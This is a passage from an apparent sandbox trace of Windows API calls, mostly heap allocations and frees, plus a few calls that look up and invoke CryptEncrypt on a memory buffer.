lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0x2f16018 [0265.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125d020 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0x2f238e0 [0265.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0x2f16018 [0265.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0265.805] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0x2f16018 [0265.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0x2f311a8 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.809] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0265.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.809] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.810] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.810] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.810] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.810] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.810] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0265.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.810] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0265.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0265.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.811] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51dd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.812] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0265.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.812] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd8c0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd8c8) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: 